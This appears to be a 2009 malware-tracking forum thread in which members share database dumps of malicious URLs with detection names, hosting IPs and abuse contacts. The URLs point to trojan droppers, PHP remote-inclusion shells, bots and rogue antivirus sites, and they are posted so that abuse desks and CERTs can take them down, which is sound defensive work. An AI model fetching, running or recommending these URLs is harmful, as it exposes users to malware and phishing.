| 2009-07-06 23:59:18 | avira      | TR/Dropper.Gen                                            | 66.71.244.130   | wnoc@wiresix.com             | US      | ARIN   | WIRESIX               | http://www.hotlinkfiles.com/files/2655943_ce2wp/fotos_Album.exe]fotos_Album.exe                                                                                                                  |
| 2009-07-08 15:01:11 | avira      | TR/Dropper.Gen                                            | 210.51.181.129  | cncipaddr@china-netcom.com   | CN      | APNIC  | CNC-BJ-IDC            | http://youtube-adult.name/id_0122.exe                                                                                                                                                            |
| 2009-07-09 19:57:17 | avira      | TR/Dropper.Gen                                            | 66.71.244.130   | wnoc@wiresix.com             | US      | ARIN   | WIRESIX               | http://www.hotlinkfiles.com/files/2660772_bgpzg/curriculum.scr                                                                                                                                   |
| 2009-07-11 19:58:49 | avira      | DR/PSW.Zapchast.zwrc.54                                   | 62.77.192.160   | abuse@invitel.net            | HU      | RIPE   | VTH                   | http://62.77.192.160/~webuser/postcard.jpg.exe                                                                                                                                                   |
| 2009-07-11 22:58:33 | avira      | TR/Crypt.ZPACK.Gen                                        | 61.139.126.91   | anti-spam@ns.chinanet.cn.net | CN      | APNIC  | CHINANET-SC           | http://www.skywebsv.com/play/cer.exe                                                                                                                                                             |
| 2009-07-14 09:57:02 | avira      | TR/Buzus.bntm                                             | 212.117.166.78  | abuse@root.lu                | LU      | RIPE   | SERVER-LU             | http://212.117.166.78/ausverkauf.exe                                                                                                                                                             |
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
34 rows in set (0.45 sec)
Title: Re: daily something......
Post by: cleanmx on July 14, 2009, 03:10:38 pm
hi

these have sometimes javascript or somethings else ... but avira, clamav and trendmicro are currenty not reporting any malware/fraud on this url's

I think they should be examined deeper... i post these here   FYI

-- gerhard

Code: [Select]
+---------------------+--------------+----------------+------------------------------+---------+--------+-----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------+
| timestamp           | virusname    | review         | email                        | country | source | netname               | url                                                                                                                                                             |
+---------------------+--------------+----------------+------------------------------+---------+--------+-----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2009-05-18 15:55:08 | unknown_html | 74.125.39.191  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://globalhackerstools.blogspot.com/2008/09/all-in-one-ultra-hacker-2008-new-tools_27.html                                                                   |
| 2009-06-30 14:01:50 | unknown_html | 88.208.17.116  | phone: +38 063 188 2888      | NL      | RIPE   | HALDEX-NET            | http://www2.porntube-vip.com/watch//downloads/FlashPlayerH264Ext.exe                                                                                            |
| 2009-06-30 14:01:50 | unknown_html | 218.85.132.243 | fjnic@fjdcb.fz.fj.cn         | CN      | APNIC  | CHINANET-FJ           | http://www.yljsx.gov.cn/images/calc.exe                                                                                                                         |
| 2009-07-01 17:53:46 | unknown_html | 80.74.145.118  | abuse@metanet.ch             | CH      | RIPE   | METANET               | http://entre-lacs.ch/1.html                                                                                                                                     |
| 2009-07-01 17:53:46 | unknown_html | 80.109.240.75  | hostmaster@chello.at         | AT      | RIPE   | AT-TELEKABEL-20010719 | http://members.chello.hu/gyenes.attila5/1.html                                                                                                                  |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57   | abuse@masterhost.ru          | RU      | RIPE   | MASTERHOST-COLOCATION | http://podarki-rnd.by.ru/images/1/2/3/4/buy.html                                                                                                                |
| 2009-07-01 17:53:46 | unknown_html | 209.59.166.237 | abuse@liquidweb.com          | US      | ARIN   | LIQUIDWEB-2           | http://www.pcngpu.com.br/1.html                                                                                                                                 |
| 2009-07-01 17:53:46 | unknown_html | 80.74.156.168  | abuse@metanet.ch             | CH      | RIPE   | METANET               | http://grandpin.ch/1.html                                                                                                                                       |
| 2009-07-01 17:53:46 | unknown_html | 72.167.232.65  | abuse@godaddy.com            | US      | ARIN   | GO-DADDY-SOFTWARE-INC | http://nogglemedia.com/1.html                                                                                                                                   |
| 2009-07-01 17:53:46 | unknown_html | 66.96.145.104  | kwitt@bizland-inc.com        | US      | ARIN   | BIZLAND-FC01          | http://ebook-friend.com/pwqswldfkre.html?UCyHhvJCU                                                                                                              |
| 2009-07-01 17:53:46 | unknown_html | 61.19.250.192  | suchok@cat.net.th            | TH      | APNIC  | CAT                   | http://saratta.com/images/1/2/3/4/buy.html                                                                                                                      |
| 2009-07-01 17:53:46 | unknown_html | 72.9.249.146   | abuse@gnax.net               | US      | ARIN   | GNAXNET               | http://fairwheelbikes.com/njfdhfiejowas.html?CgbNLg                                                                                                             |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://cookzidigo1984.googlegroups.com/web/Index5.html?gda=cA4xsj4AAAAUrONGIfshKYzP_pPasy2HS9sH-CYRB06_bMAh3oeDS07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx     |
| 2009-07-01 17:53:46 | unknown_html | 72.167.232.230 | abuse@godaddy.com            | US      | ARIN   | GO-DADDY-SOFTWARE-INC | http://tudatosbiztonsag.com/frew9riuewods.html?CQOuNtk                                                                                                          |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://parkernifeja1980.googlegroups.com/web/Index5.html?gda=XIDTdj4AAABVan8diZdyODBkZ07ksmLZSduHNVPn0lwlkdSFb2uh_k7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx   |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://millerlojifi1981.googlegroups.com/web/Index5.html?gda=UKjnkD4AAAAUZbPPzR8lan7ls97bTuePaMD_fMZblYsPxSXEdzJi0E7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx   |
| 2009-07-01 17:53:46 | unknown_html | 90.156.153.106 | abuse@masterhost.ru          | RU      | RIPE   | MASTERHOST            | http://vippodarki.su/images/1/2/3/4/buy.html                                                                                                                    |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://robinsonnyqely1978.googlegroups.com/web/Index5.html?gda=v83xTT4AAABaW0SLoLlP-nQ40g4dkyaUAK5RJIrd9MaFPSL3ekVz8k7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com    | GB      | RIPE   | CH-YAHOO              | http://profiles.yahoo.com/blog/UF6VBDVCTTTIAIH5UJTFTDZXJM?eid=AykUIDBmkHQN2blLw7WjbLTls27AdNGhQuoxSVmZFkr9VSHHYw                                                |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com    | GB      | RIPE   | CH-YAHOO              | http://profiles.yahoo.com/blog/2XMNQRSXYVGNUUO2RWJGDRPAKM?eid=LKveJ5xgzS_IOJnysoFvbz2O6.KN84UJkq8Y7EAwQoVpm7RVzw                                                |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com    | GB      | RIPE   | CH-YAHOO              | http://profiles.yahoo.com/blog/IWJV4HSIWJO65P2ARC3QJEZU4E?eid=xwnLgaM2y3zG.Wrls4skh4ujc7NZ.b8bIkrpe1eviKv_VaZwVQ                                                |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com    | GB      | RIPE   | CH-YAHOO              | http://profiles.yahoo.com/blog/TTIOM3EBKPOJQOH4IEOP6F6KHI?eid=6CCDB7lnn37pLAU3CbeBAHhSEMZlTo5NISCBScNcduZP8ktisQ                                                |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com    | GB      | RIPE   | CH-YAHOO              | http://profiles.yahoo.com/blog/UD75QFVUPKIZJEKD36B5YJRFII?eid=AS0CmkQxmXQP_9LXWUx_rqrQbbdYq4JEOvQtBklg2YiNHml2ow                                                |
| 2009-07-01 17:53:46 | unknown_html | 201.33.17.121  | contato@datacorpore.com.br   | BR      | LACNIC | 008.210.265/0001-26   | http://projetomaosdadas.org/moewkplsa.html?kBmLfuiPc                                                                                                            |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57   | abuse@masterhost.ru          | RU      | RIPE   | MASTERHOST-COLOCATION | http://rtikamaz.by.ru/nguehjdmnska.html?EqNuQanVj                                                                                                               |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57   | abuse@masterhost.ru          | RU      | RIPE   | MASTERHOST-COLOCATION | http://rtikamaz.by.ru/nguehjdmnska.html?ohhUnZs                                                                                                                 |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57   | abuse@masterhost.ru          | RU      | RIPE   | MASTERHOST-COLOCATION | http://rtikamaz.by.ru/nguehjdmnska.html?QwVpihZg                                                                                                                |
| 2009-07-01 17:53:46 | unknown_html | 87.242.78.57   | abuse@masterhost.ru          | RU      | RIPE   | MASTERHOST-COLOCATION | http://studyfoundry.by.ru/gfekowkfeosd.html?7H1BB                                                                                                               |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://hughesconufo1986.googlegroups.com/web/Index5.html?gda=0I6akz4AAABzJoncJQYrPGjbeasFFmdbRyjR8pcLw5RY6hAKFCZRj07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx   |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://howarddukyji1977.googlegroups.com/web/Index5.html?gda=y6MJej4AAABv1pS0tx1d9OqjhdsrWIIu-LNb24h9VsKL8WbSeUKLSU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx   |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://clarkqodubo1987.googlegroups.com/web/Index5.html?gda=3_3R_j4AAACs6KG2Ckc1FIch73EAo2Sah9vxzBS9DAyUfuOQJ518P07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx    |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://powelljeruda1985.googlegroups.com/web/Index5.html?gda=iwDitz4AAADiXhM7N9HjtaAgymI4Vc40l-L-jzasWj--FgC_pFWbFE7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx   |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://leeteqoku1984.googlegroups.com/web/Index5.html?gda=ACpmBz4AAACoXxfdVTUpZahJ3X89TepfoKRVV5C9d54Y9y3J06kds07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx      |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://evanslucoce1985.googlegroups.com/web/Index5.html?gda=uNuUkz4AAABx_3PjzrnXA5jh0yfbkGiCL60X8D5oOnNH6BMQbCWcrk7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx    |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://fosterhyzody1987.googlegroups.com/web/Index5.html?gda=_pMy0T4AAAB7IfldT9E8kXR6OvEeUYfWhapeTkXFL2vDREaGX4eyP07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx   |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://cooperwypunu1987.googlegroups.com/web/Index5.html?gda=1FB-WT4AAACj7WHp7os86Au9u4NuiJDlySdCQLMlV9HlwEZxtD9DAk7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx   |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com    | GB      | RIPE   | CH-YAHOO              | http://profiles.yahoo.com/blog/5X7H5Q2X5ZZMFBZHVE4C74ENJE?eid=n4MAr6Vkn3o_1GnTbDocHBqcwXcF8H7DaMytJ1yG9TeHxVXnCg                                                |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://longdovape1977.googlegroups.com/web/Index5.html?gda=jsx7mj4AAAAVd6afZvykctiFsUahpWoKans2ZG_0R1guYsdEP5iVVU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx     |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://morrismipanu1978.googlegroups.com/web/Index5.html?gda=N58hSz4AAACIb0LGJp38fhqPSrP2G1ZuMdJG8dMFNK7g-KV0OKPR807SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx   |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://bellrufovi1984.googlegroups.com/web/Index5.html?gda=xxx                                                                                                  |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://bakersypypy1984.googlegroups.com/web/Index5.html?gda=47DJoz4AAACbhW_MZTUrT9-QsVWWJ1ZyvrWH07qmMmlNlOt8tukq5E7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx    |
| 2009-07-01 17:53:46 | unknown_html | 94.198.98.17   | phone: +39 3297488302        | IT      | RIPE   | SUPERNOVA-NET         | http://www.postapop3.netsons.org/po3.html                                                                                                                       |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://garciacufiti1983.googlegroups.com/web/Index5.html?gda=OeeYdz4AAABIeTRSouOs75JjnDXHCwADKTrIBnTVU-2vLl4ZTUOY5E7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx   |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://collinsdahyso1984.googlegroups.com/web/Index5.html?gda=UdfB7T4AAABUsvVsyDye1ForhJuVZb0cEHYyCzh6VTQc_UQ0Ah6Qc07SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx  |
| 2009-07-01 17:53:46 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com    | GB      | RIPE   | CH-YAHOO              | http://profiles.yahoo.com/blog/JJ2GSDOYO76CMLG6ABAZFFUJ74?eid=rB0o1ahnynVJOwQvjf4x3edUCf3B.jj3gBf2_1ilBcG_QSA.LA                                                |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://gonzalescatotu1980.googlegroups.com/web/Index5.html?gda=cBF7lz4AAAARaEn3MxokYleE6Hyh4HtUca9u6gwhXeLk4pJUM2UELU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137  | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://belldenyhe1985.googlegroups.com/web/Index5.html?gda=OeMRPz4AAAB_pc5n6AdBZ8kMenK1w222XRWzDTlLBoPitQCAWlwmUU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx     |
| 2009-07-01 17:53:46 | unknown_html | 216.108.235.39 | noc@premianet.com            | US      | ARIN   | PREMIANET             | http://bude.comoj.com/news.html?bshKTPnjLdI                                                                                                                     |
| 2009-07-01 17:53:46 | unknown_html | 216.108.235.73 | noc@premianet.com            | US      | ARIN   | PREMIANET             | http://nettecicek.comli.com/news.html?TWtzUJT                                                                                                                   |
| 2009-07-01 17:53:46 | unknown_html | 97.74.144.107  | abuse@godaddy.com            | US      | ARIN   | GO-DADDY-SOFTWARE-INC | http://daminiartisans.com/qwality.html?jrmoghclti                                                                                                               |
| 2009-07-01 17:53:46 | unknown_html | 194.170.187.32 | abuse@emirates.net.ae        | AE      | RIPE   | EXCHANGE-EMIRNET      | http://www.panache.ae/qwality.html?UnaavJfswLfmcBP                                                                                                              |
| 2009-07-01 17:53:46 | unknown_html | 168.143.174.29 | abuse@ntt.net                | US      | ARIN   | NTTA-168-143          | http://bit.ly/JDotw                                                                                                                                             |
| 2009-07-01 17:53:47 | unknown_html | 72.167.232.202 | abuse@godaddy.com            | US      | ARIN   | GO-DADDY-SOFTWARE-INC | http://www.pinkgingershop.com/images/1/2/3/4/buy.html                                                                                                           |
| 2009-07-01 17:53:47 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com    | GB      | RIPE   | CH-YAHOO              | http://profiles.yahoo.com/blog/MZKZ4EJAQDE4QD7CWXDRDMKSJY?eid=KxQqejs3n3jZokVUNcRK5zSW4lDFBvetF8eu0PPTnvcgvE2IAg                                                |
| 2009-07-05 23:57:26 | unknown_html | 211.244.22.30  | kidc@hanbiro.com             | KR      | APNIC  | KRNIC-KR              | http://softwarekeysmartphones.com/Corel.php                                                                                                                     |
| 2009-07-10 14:05:44 | unknown_html | 92.241.176.188 | abuse@netplace.ru            | RU      | RIPE   | NETPLACE              | http://advanced-virus-remover2009.com/terms.php??code=00000000                                                                                                  |
| 2009-07-10 14:05:44 | unknown_html | 88.198.105.145 | abuse@hetzner.de             | DE      | RIPE   | DE-HETZNER-20051227   | http://antiviruslicensepurchase.com/en.gif                                                                                                                      |
| 2009-07-10 14:05:45 | unknown_html | 87.118.86.125  | abuse@keyweb.de              | DE      | RIPE   | DE-KEYWEB-IV          | http://goldtraf.su/showbanner.php?kod=920098&site=www.test.ru                                                                                                   |
| 2009-07-10 14:05:45 | unknown_html | 202.101.42.130 | anti-spam@ns.chinanet.cn.net | CN      | APNIC  | CHINANET-SH           | http://tong-ji.com/sj19.htm                                                                                                                                     |
| 2009-07-10 14:05:45 | unknown_html | 202.101.42.130 | anti-spam@ns.chinanet.cn.net | CN      | APNIC  | CHINANET-SH           | http://tong-ji.com/index.htm                                                                                                                                    |
+---------------------+--------------+----------------+------------------------------+---------+--------+-----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------+
60 rows in set (0.43 sec)
Title: Re: daily something......
Post by: SysAdMini on July 14, 2009, 03:11:57 pm
see also http://support.clean-mx.de/clean-mx/viruses?response=alive (http://support.clean-mx.de/clean-mx/viruses?response=alive)

Hi Gerhard,

interesting database. I didn't know it.
Title: Re: daily something......
Post by: cleanmx on July 14, 2009, 03:21:29 pm
Hi

we maintain three databases

phishing-> http://support.clean-mx.de/clean-mx/phishing.php?sort=id%20desc&response=alive (http://support.clean-mx.de/clean-mx/phishing.php?sort=id%20desc&response=alive)
abused servers/platforms -> http://support.clean-mx.de/clean-mx/portals.php?sort=id%20desc&response=alive (http://support.clean-mx.de/clean-mx/portals.php?sort=id%20desc&respnse=alive)
and malware -> http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive (http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive)

We notify network abuse contacts and national cert's to close down these activities....

I would be fine to get a constant feed from malwaredomainlist....

update:

you may query only for currenty still active malwaredomainlist url's with:

http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive&sub=sub4 (http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive&sub=sub4)

if you omitt &response=alive, you will get all ....

-- gerhard
Title: Re: daily something......
Post by: cleanmx on July 16, 2009, 03:00:27 pm
another bunch.. including RFI's

xml:
http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=xml (http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=xml)

csv:
http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=csv (http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=csv)


-- gerhard
Title: Re: daily something......
Post by: sparsha on July 19, 2009, 08:09:12 pm
Sites used by the braviax/brastk family to distribute rogues

Code: [Select]
Home-av-2010.com
Home-av2010.com
Homeav2010.com
Home-anti-virus-2010.com
Homeantivirus2010.com
Home-antivirus2010.com
Homeanti-virus-2010.com
Home-anti-virus2010.com
Home-anti-virus-2010.com
Homeanti-virus2010.com
Homeantivirus-2010.com

Pc-security09.com
Pcsecurity09.com
Pcsecurity-09.com
Title: Re: daily something......
Post by: cleanmx on July 20, 2009, 06:24:45 am
some malware

Code: [Select]
+----------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| from_unixtime(first) | scanner    | virusname                                                 | review          | email                        | country | source | netname                     | url                                                                                                                                                                                              |
+----------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2009-07-19 17:56:40  | undef      | unknown_html                                              | 94.23.1.47      | abuse@ovh.net                | FR      | RIPE   | OVH                         | http://www.lestoquesdeladalle.com/images/download stub32i.exe                                                                                                                                    |
| 2009-07-18 23:57:53  | undef      | unknown_html_RFI_php                                      | 80.237.132.88   | net-abuse@hosteurope.de      | DE      | RIPE   | HE-SH-CGN-NET               | http://www.silencio-dinklage.de//redaxo/include/classes/id3.txt                                                                                                                                  |
| 2009-07-18 23:57:53  | avira      | PHP/BDS/H.C                                               | 194.135.105.25  | ip-reg@ripn.net              | RU      | RIPE   | RU-RELCOM-194-135           | http://www.gosstroy.com/images/kampret.jpg                                                                                                                                                       |
| 2009-07-18 23:57:53  | avira      | PHP/Pbot.A                                                | 89.111.176.103  | abuse@hc.ru                  | RU      | RIPE   | CENTROHOST-NET              | http://www.guardian-psj.ru/assets/media/X                                                                                                                                                        |
| 2009-07-18 23:57:53  | undef      | unknown_html_RFI_php                                      | 81.12.13.152    | mzargar@yahoo.com            | IR      | RIPE   | SINET-SHARIATI              | http://www.iran-eschool.com//images/shirohige/fxid.txt                                                                                                                                           |
| 2009-07-18 23:57:53  | avira      | SPR/PHP.ID                                                | 195.117.130.224 |                              | PL      | RIPE   | FIRMA-MUCHA-KRZYSZTOF-MUCHA | http://www.ksi-klasa.pl//104/Rosid.txt                                                                                                                                                           |
| 2009-07-18 23:57:50  | undef      | unknown_html_RFI_php                                      | 89.96.184.80    | abuse@fastweb.it             | IT      | RIPE   | FASTWEB-LINKEM              | http://www.acb.bs.it/fad/test.txt                                                                                                                                                                |
| 2009-07-18 23:57:49  | undef      | unknown_html_RFI_php                                      | 82.197.131.52   | abuse@attractsoft.com        | DE      | RIPE   | LNC-ATTRACTSOFT-GMBH        | http://segurancabradesco.awardspace.com/cmd_inc.htm                                                                                                                                              |
| 2009-07-18 23:57:48  | avira      | SPR/PHP.ID                                                | 83.137.192.222  | bas@superior.nl              | NL      | RIPE   | SUPERIOR-NL                 | http://partycentrumdemolen.nl//mambots/system/osyid.txt                                                                                                                                          |
| 2009-07-18 19:39:18  | avira      | EXP/Pidief.UA                                             | 195.88.191.46   | cardiro@cardiro.org          | RU      | RIPE   | BIGNESS-GROUP-NET           | http://yawxowaj.cn/22/oldBelow.pdf                                                                                                                                                               |
| 2009-07-18 19:39:18  | undef      | unknown_exe                                               | 85.17.162.217   | abuse@leaseweb.com           | NL      | RIPE   | LEASEWEB                    | http://v-i-e-w.net/xrun.tmp                                                                                                                                                                      |
| 2009-07-18 19:39:18  | avira      | TR/Crypt.ZPACK.Gen                                        | 72.26.101.150   | dnsadmin@alchemy.net         | US      | ARIN   | ALCH                        | http://installmoney.com/svchost.exe                                                                                                                                                              |
| 2009-07-18 19:39:18  | avira      | TR/Dropper.Gen                                            | 74.54.241.100   | abuse@theplanet.com          | US      | ARIN   | NETBLK-THEPLANET-BLK-14     | http://theinstalls.com/files/uprograms/dailybucks/dailybucks_install.exe                                                                                                                         |
| 2009-07-18 19:39:18  | undef      | unknown_exe                                               | 63.134.244.77   | abuse@crystaltech.com        | US      | ARIN   | CRYSTALTECH-BLK-6           | http://dapda.cn/setup.exe                                                                                                                                                                        |
| 2009-07-18 19:39:18  | undef      | unknown_exe                                               | 74.54.241.100   | abuse@theplanet.com          | US      | ARIN   | NETBLK-THEPLANET-BLK-14     | http://theinstalls.com/files/uprograms/dailybucks/install.48349.exe                                                                                                                              |
| 2009-07-18 19:39:18  | avira      | TR/Dropper.Gen                                            | 212.117.174.14  | abuse@root.lu                | LU      | RIPE   | SERVER-LU                   | http://212.117.174.14/installnew2.exe                                                                                                                                                            |
| 2009-07-18 19:39:18  | clamav     | PHP.Bot                                                   | 66.7.213.211    | abuse@dimenoc.com            | US      | ARIN   | DIMECNET                    | http://www.intel9.com.br/ircbot/Q.txt                                                                                                                                                            |
| 2009-07-18 03:03:10  | avira      | BDS/Agent.1260.A                                          | 67.186.51.77    | abuse@comcast.net            | US      | ARIN   | ATT-COMCAST                 | http://c-67-186-51-77.hsd1.oh.comcast.net/card.exe                                                                                                                                               |
| 2009-07-17 22:01:50  | undef      | unknown_html_RFI_php                                      | 124.0.159.141   | ip-tech@sknetworks.co.kr     | KR      | APNIC  | SKNETWORKS                  | http://www.seokrim.ms.kr//data/shirohige/zfxid.txt                                                                                                                                               |
| 2009-07-17 22:01:50  | clamav     | PHP.Id-5                                                  | 80.93.54.68     | abuse@peterhost.ru           | RU      | RIPE   | PETERHOST-PITER             | http://www.1remont.ru/readme.txt                                                                                                                                                                 |
| 2009-07-17 22:01:40  | avira      | DR/PSW.Zapchast.zwrc.54                                   | 193.218.160.67  | waqar@gigo.co.uk             | GB      | RIPE   | GIGOSYSTEM                  | http://193.218.160.67/~PlcmSpIp/postcard.jpg.exe                                                                                                                                                 |
| 2009-07-17 17:02:42  | avira      | DR/PSW.Zapchast.zwrc.116                                  | 210.188.255.10  | abuse@odn.ad.jp              | JP      | APNIC  | JPNIC-NET-JP                | http://210.188.255.10/~yamazaki/MichaelJackson.jpg.exe                                                                                                                                           |
| 2009-07-16 23:06:00  | undef      | unknown_exe                                               | 69.174.115.139  | abuse@comcast.net            | US      | ARIN   | COMCAST-ADEL-69-174-0-0     | http://www.24-7agtv.com/hotshotsvideoproductions.com/templates/ja_rochea/scripts/ja.script.js                                                                                                    |
| 2009-07-16 23:04:53  | undef      | unknown_exe                                               | 220.248.172.39  | abuse@cnc-noc.net            | CN      | APNIC  | CNC-Hunan-province          | http://win3821.com/SmartDownload.exe                                                                                                                                                             |
| 2009-07-16 17:46:11  | avira      | EXP/PHP.E                                                 | 201.144.241.226 | abuse@uninet.net.mx          | MX      | LACNIC | MX-REUN-LACNIC              | http://www.centralfilms.net/cgi/bots/red.txt                                                                                                                                                     |
| 2009-07-16 17:45:45  | clamav     | PHP.Id                                                    | 221.143.46.104  | abuse@hanaro.com             | KR      | APNIC  | HANANET                     | http://impeel.com/impeel/wizard/r0x-id.txt                                                                                                                                                       |
| 2009-07-16 03:56:24  | undef      | unknown_exe                                               | 213.165.82.102  | abuse@oneandone.net          | DE      | RIPE   | SCHLUND-CUSTOMERS           | http://www.lux-luxury.com/templates/ja_teline_ii/js/ja.script.js                                                                                                                                 |
| 2009-07-16 03:56:03  | avira      | TR/Spy.Banker.BAC.1                                       | 194.0.252.241   | abuse@vooservers.com         | GB      | RIPE   | vooservers                  | http://194.0.252.241/.../Bradescompleto.scr                                                                                                                                                      |
| 2009-07-14 18:58:01  | trendmicro | TSPY_ZBOT.MCS                                             | 61.235.117.83   | wangpei@chinatietong.com     | CN      | APNIC  | CRTC                        | http://allavers.org/_vps_lib/ldr.exe                                                                                                                                                             |
| 2009-07-14 18:58:00  | avira      | TR/FraudPack.any                                          | 72.34.43.224    | admin@ihnetworks.net         | US      | ARIN   | IHNET-PI-1                  | http://arkbroadcasters.org/loader.exe                                                                                                                                                            |
| 2009-07-08 15:01:11  | avira      | TR/Dropper.Gen                                            | 210.51.181.129  | cncipaddr@china-netcom.com   | CN      | APNIC  | CNC-BJ-IDC                  | http://youtube-adult.name/id_0122.exe                                                                                                                                                            |
| 2009-07-06 19:04:09  | undef      | unknown_exe                                               | 82.103.141.146  | abuse@easyspeedy.com         | DK      | RIPE   | EASYSPEEDY-NETWORK          | http://www.ymmoo.net/setup_ymmoo.exe                                                                                                                                                             |
| 2009-07-01 17:53:46  | undef      | unknown_exe                                               | 74.125.39.137   | arin-contact@google.com      | US      | ARIN   | GOOGLE                      | http://kodenadaqequnul2.googlegroups.com/web/a289743kjhfkjhkj3hkj.swf?gda=q-N2NUsAAACuGiGjtYknYpnLJ9JOD6VhQaFUmokO1f_8pAMqUmUp_d812b7JYV_uUBJlRIiigwRbYpQIvmf_l9f_E8k9I2rxBkXa90K8pT5MNmkW1w_4BQ |
| 2009-06-30 14:01:50  | undef      | unknown_exe                                               | 208.113.150.124 | abuse@dreamhost.com          | US      | ARIN   | DREAMHOST-BLK6              | http://palsol.com/downloads/spyrem_setup.exe                                                                                                                                                     |
| 2009-06-30 14:01:50  | undef      | unknown_exe                                               | 64.208.226.93   | abuse@gblx.net               | US      | ARIN   | GBLX-11A                    | http://privacy-care.com/bin/SpywareExpertInstall.exe                                                                                                                                             |
